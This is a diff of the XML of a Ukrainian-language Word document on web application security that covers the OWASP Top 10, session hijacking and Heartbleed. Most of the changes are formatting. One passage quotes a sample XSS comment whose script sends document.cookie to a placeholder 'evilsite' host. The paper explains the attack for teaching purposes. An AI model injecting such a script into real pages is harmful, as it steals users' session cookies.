-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> інструменти, такі як Authentication Tester, Token Analy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">zer і HTTP Request Editor, які можуть бути використані </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>при тестуванні на наявність вразливостей вручну.</w:t>
+        <w:t>Підтримка інструментів: в наявності є інструменти, такі як Authentication Tester, Token Analyzer і HTTP Request Editor, які можуть бути використані при тестуванні на наявність вразливостей вручну.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25278,7 +25859,6 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
@@ -25289,7 +25869,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
@@ -25300,7 +25879,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
@@ -25310,7 +25888,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
@@ -25320,7 +25897,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
@@ -25330,7 +25906,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
@@ -25347,11 +25922,10 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -25364,7 +25938,79 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>AppScan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> взмозі відшукати більшість вразливостей перелічених в специфікації </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>OWASP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
@@ -25375,83 +26021,41 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Даний список</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Список </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> містить перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Список не включає в себе всі можливі типи вразливостей, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>OWASP</w:t>
-      </w:r>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>кр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>містить</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Список не включає в себе всі можливі типи вразливостей, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>кр</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
@@ -25468,7 +26072,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
@@ -25479,19 +26082,28 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Список</w:t>
+        <w:t xml:space="preserve">Список </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>OWASP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
@@ -25503,211 +26115,50 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>OWASP</w:t>
+        <w:t>Top</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> 10 є кращою практикою усунення вразливостей </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Top</w:t>
+        <w:t>Web</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 10 </w:t>
+        <w:t>-додатків</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>є</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>кращою</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>практикою</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>усунення</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>вразливостей</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Web</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>додатків</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
@@ -25835,7 +26286,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Друга найбільш небезпечна уразливість в списку OWASP пов'язана з методами аутентифікації і захисту користувальницьких сеансів в Web-додатку. Існує безліч типів цієї уразливості, одним з яких є несанкціоноване використання сеансу.</w:t>
+        <w:t>Друга найбільш небезпечна уразливість в списку OWASP пов'язана з методами аутентифікації і захисту користувальницьких сеансів в Web-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>додатку. Існує безліч типів цієї уразливості, одним з яких є несанкціоноване використання сеансу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25888,7 +26351,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентиф</w:t>
       </w:r>
       <w:r>
@@ -26108,7 +26570,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> XSS-атак. Нижче показаний приклад коментаря (This is a great product &lt;script&gt; document.write ( '&lt;img scr = http: //evilsite/'+document.cookie&gt;'); &lt;/ script &gt;&gt;), що впроваджує в Web-сторінку XSS -сценарій, який намагається дізнатися ідентифікатор сеансу користувача.</w:t>
+        <w:t xml:space="preserve"> XSS-атак. Нижче показаний приклад коментаря (This is a great product &lt;script&gt; document.write ( '&lt;img scr = http: //evilsite/'+document.cookie&gt;'); &lt;/ script &gt;&gt;), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>що впроваджує в Web-сторінку XSS -сценарій, який намагається дізнатися ідентифікатор сеансу користувача.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26161,7 +26635,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>4. Небезпечні прямі посилання на об'єкти</w:t>
       </w:r>
     </w:p>
@@ -26399,7 +26872,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Web-додаток повинен правильно працювати з уразливими даними і захищати їх. Для запобігання витоку даних в процесі їх обробки, передачі і зберігання необхідно забезпечувати захист на всіх рівнях за допомогою надійних процедур контролю доступу, загальновизнаних криптоалгоритмів і методів управління ключами шифрування.</w:t>
+        <w:t xml:space="preserve">Web-додаток повинен правильно працювати з уразливими даними і захищати їх. Для запобігання витоку даних в процесі їх обробки, передачі і зберігання необхідно забезпечувати захист на всіх рівнях за допомогою надійних </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>процедур контролю доступу, загальновизнаних криптоалгоритмів і методів управління ключами шифрування.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26413,7 +26898,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -26427,13 +26912,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="708"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:outlineLvl w:val="1"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -26442,17 +26921,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">7. Відсутність контролю доступу до функціонального </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -26956,7 +27424,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Web-додаток використовує Open Source-компоненти, наприклад, бібліотеку OpenSSL, що забезпечує TLS / SSH-шифрування Web-сайтів (HTTPS). У квітні 2014 року в декількох версіях цієї бібліотеки була виявлена критична вразливість CVE-2014-0160, відома як Heartbleed.</w:t>
